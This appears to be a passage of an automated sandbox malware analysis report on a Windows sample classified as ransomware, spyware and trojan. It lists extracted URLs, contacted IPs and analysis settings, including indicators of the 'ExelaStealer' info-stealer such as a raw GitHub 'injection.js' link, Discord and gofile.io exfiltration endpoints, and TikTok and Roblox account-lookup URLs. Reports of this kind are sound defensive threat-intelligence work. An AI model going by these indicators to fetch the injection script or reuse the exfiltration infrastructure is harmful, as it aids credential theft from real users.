                                                                        https://twitter.comrename_me_before.exe, 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870rename_me_before.exe, 00000001.00000003.1890796970.000001B1033C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://twitter.com/homerename_me_before.exe, 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://nuget.org/nuget.exepowershell.exe, 00000045.00000002.1843174125.000001DBCF1C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.1826414031.000001DBC0974000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.1843174125.000001DBCF082000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://cacerts.digirename_me_before.exe, 00000000.00000003.1663922956.000001CF0A292000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://docs.python.org/3/library/subprocess#subprocess.Popen.killrename_me_before.exe, 00000001.00000002.1977466088.000001B100D40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://github.com/python-attrs/attrs/issues/136rename_me_before.exe, 00000001.00000002.1975958598.000001B1006A7000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965506103.000001B1005D5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966055870.000001B100617000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1970448147.000001B1006A7000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1679845016.000001B100B67000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1968725950.000001B1006A6000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966129249.000001B100693000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965777162.000001B1005E8000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1679845016.000001B100BB8000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965048386.000001B10058E000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1679902734.000001B1009F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&barename_me_before.exe, 00000001.00000002.1976903040.000001B100B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://gofile.io/d/ukhEgs)rename_me_before.exe, 00000001.00000002.1979075425.000001B101E80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://i.hizliresim.com/8po0puy.jfifrename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://peps.python.org/pep-0205/rename_me_before.exe, 00000001.00000002.1974448798.000001B100440000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drfalse
                                                                                              		high
                                                                                              http://docs.python.org/3/library/subprocess#subprocess.Popen.returncoderename_me_before.exe, 00000001.00000002.1977564898.000001B100E40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000045.00000002.1826414031.000001DBBF011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://webcast.tiktok.com/webcast/wallet_api/diamond_buy/permission/?aid=1988&app_language=de-DE&aprename_me_before.exe, 00000001.00000002.1978690429.000001B101D04000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1979075425.000001B101E80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 0000002A.00000003.1749773200.000001D218CC2000.00000004.00000800.00020000.00000000.sdmp, edb.log.42.dr, qmgr.db.42.drfalse
                                                                                                      		high
                                                                                                      https://i.hizliresim.com/6t31tw2.jpgPrename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://zopeinterface.readthedocs.io/en/latest/rename_me_before.exe, 00000001.00000003.1965506103.000001B1005D5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966055870.000001B100617000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1975824517.000001B100655000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1968170677.000001B100654000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965777162.000001B1005E8000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965048386.000001B10058E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688rename_me_before.exe, 00000001.00000003.1667996233.000001B17E531000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1981358821.000001B17FEA8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000045.00000002.1826414031.000001DBBF244000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000045.00000002.1826414031.000001DBBF244000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://go.micropowershell.exe, 00000045.00000002.1826414031.000001DBBFC44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://raw.githubusercontent.com/justforExela/injection/main/injection.jsrename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerrename_me_before.exe, 00000001.00000003.1965401133.000001B17E4F0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966237596.000001B17E535000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1981201596.000001B17E536000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1667996233.000001B17E531000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1668933285.000001B17E528000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669358961.000001B17E510000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1670306810.000001B17E523000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1668055844.000001B17E535000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669127853.000001B17E528000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965746028.000001B17E529000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://github.com/python/cpython/issues/86361.rename_me_before.exe, 00000001.00000003.1968595963.000001B1005C0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669775645.000001B1005E2000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1670268190.000001B100598000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669887991.000001B1005BF000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1968509131.000001B1005BD000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966526691.000001B1005BC000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1673647231.000001B100579000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1670211447.000001B10058C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1671664245.000001B10058C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1975257853.000001B1005C1000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1670048680.000001B1005C3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669837588.000001B1005F9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965048386.000001B10058E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://contoso.com/Iconpowershell.exe, 00000045.00000002.1843174125.000001DBCF082000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://discord.com/api/v8/users/rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://i.hizliresim.com/qxnzimj.jpgrename_me_before.exe, 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://www.apache.org/licenses/rename_me_before.exe, 00000000.00000003.1662503428.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, LICENSE.APACHE.0.drfalse
                                                                                                                              		high
                                                                                                                              https://www.attrs.org/en/latest/names.html)rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                		high
                                                                                                                                https://www.twitch.tv/rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://crl.ver)svchost.exe, 0000002A.00000002.2920593241.000001D218A00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=mainrename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://open.spotify.com/user/rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlrename_me_before.exe, 00000001.00000003.1673393839.000001B100980000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016rename_me_before.exe, 00000001.00000003.1719040380.000001B103409000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101C80000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1719040380.000001B1034AA000.00000004.00000020.00020000.00000000.sdmp, Historys.txt.1.drfalse
                                                                                                                                            		high
                                                                                                                                            https://www.reddit.com/user/Prename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://filepreviews.io/rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brrename_me_before.exe, 00000001.00000003.1719040380.000001B103473000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101C80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000045.00000002.1826414031.000001DBBF244000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://cryptography.io/en/latest/installation/rename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syrename_me_before.exe, 00000001.00000003.1965401133.000001B17E4F0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966237596.000001B17E535000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1981201596.000001B17E536000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1667996233.000001B17E531000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1668933285.000001B17E528000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669358961.000001B17E510000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1670306810.000001B17E523000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1668055844.000001B17E535000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669127853.000001B17E528000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965746028.000001B17E529000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://twitter.com/homePrename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://docs.python.org/3/library/multiprocessing.htmlrename_me_before.exe, 00000001.00000003.1970570414.000001B100618000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971203694.000001B10061B000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965506103.000001B1005D5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1675049880.000001B100613000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966055870.000001B100617000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1975666963.000001B10061C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1677223508.000001B100613000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1673647231.000001B100613000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1671664245.000001B100613000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965777162.000001B1005E8000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1670798799.000001B100615000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965048386.000001B10058E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://github.com/python-attrs/attrs/issues/1165)rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661709047.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://gofile.io/d/ukhEgsrename_me_before.exe, 00000001.00000003.1964419181.000001B102D12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=referral&utm_campaMETADATA.0.drfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                https://open.spotify.com/user/Prename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://www.attrs.org/en/stable/changelog.htmlrename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://cryptography.io/en/latest/security/rename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://github.com/python-attrs/attrs/issues/1141)rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://i.hizliresim.com/6t31tw2.jpgrename_me_before.exe, 00000001.00000003.1966972745.000001B102228000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://thumbnails.roblox.com/v1/users/avatar?userIds=rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://www.variomedia.de/rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://bugs.python.org/issue37179rename_me_before.exe, 00000001.00000003.1891156202.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977125594.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1947237648.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1964107785.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1953054230.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1969941981.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977852804.000001B101140000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971261333.000001B100CC5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1685174704.000001B100CB3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C48000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977307117.000001B100CD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesrename_me_before.exe, 00000001.00000003.1719040380.000001B1033E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://www.reddit.com/user/rename_me_before.exe, 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyrename_me_before.exe, 00000001.00000003.1965746028.000001B17E529000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmrename_me_before.exe, 00000001.00000003.1673393839.000001B100980000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://github.com/pyca/cryptography/issuesMETADATA0.0.drfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://readthedocs.org/projects/cryptography/badge/?version=latestrename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://t.me/ExelaStealerrename_me_before.exe, 00000001.00000003.1966972745.000001B102228000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://www.attrs.org/METADATA.0.drfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://github.com/python-attrs/attrs/issues/1158)rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661709047.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://mahler:8092/site-updates.pyrename_me_before.exe, 00000001.00000002.1976728516.000001B1009F2000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1968294358.000001B1009F1000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1953054230.000001B1009CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFrename_me_before.exe, 00000001.00000003.1719040380.000001B103473000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://github.com/python-attrs/attrs/issues/1203)rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661709047.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://www.attrs.org/en/23.2.0/_static/sponsors/Tidelift.svgrename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        https://github.com/pyca/cryptographyrename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://www.python.org/download/releases/2.3/mro/.rename_me_before.exe, 00000001.00000002.1981358821.000001B17FE20000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://cryptography.io/METADATA0.0.drfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://docs.python.org/3/library/asyncio-eventloop.htmlrename_me_before.exe, 00000001.00000002.1977125594.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1964107785.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1953054230.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977852804.000001B101140000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1685174704.000001B100CB3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://i.hizliresim.com/eai9bwi.jpg0rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high

                                                                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                                                  Public IPs

                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                  208.95.112.1
                                                                                                                                                                                                                  		ip-api.comUnited States
                                                                                                                                                                                                                  		53334TUT-ASUSfalse
                                                                                                                                                                                                                  162.159.137.232
                                                                                                                                                                                                                  		canary.discord.comUnited States
                                                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                  162.159.128.233
                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                  45.112.123.126
                                                                                                                                                                                                                  		api.gofile.ioSingapore
                                                                                                                                                                                                                  		16509AMAZON-02USfalse
                                                                                                                                                                                                                  45.112.123.227
                                                                                                                                                                                                                  		store1.gofile.ioSingapore
                                                                                                                                                                                                                  		16509AMAZON-02USfalse

                                                                                                                                                                                                                  Private

                                                                                                                                                                                                                  IP
                                                                                                                                                                                                                  127.0.0.1

                                                                                                                                                                                                                  General Information

                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                  Analysis ID:1582938
                                                                                                                                                                                                                  Start date and time:2025-01-01 02:52:08 +01:00
                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                  Overall analysis duration:0h 9m 32s
                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                  Number of analysed new started processes analysed:78
                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                  Sample name:rename_me_before.exe
                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                  Classification:mal100.rans.spre.phis.troj.spyw.expl.evad.winEXE@130/182@4/6
                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                  • Successful, ratio: 50%
                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                  • Successful, ratio: 80%
                                                                                                                                                                                                                  • Number of executed functions: 68
                                                                                                                                                                                                                  • Number of non-executed functions: 121
                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                                                                                                                  Warnings

                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.109.210.53, 13.95.31.18, 52.149.20.212, 13.107.246.45
                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                                                                                  • Execution Graph export aborted for target mshta.exe, PID 2108 because there are no executed function
                                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 1668 because it is empty
                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
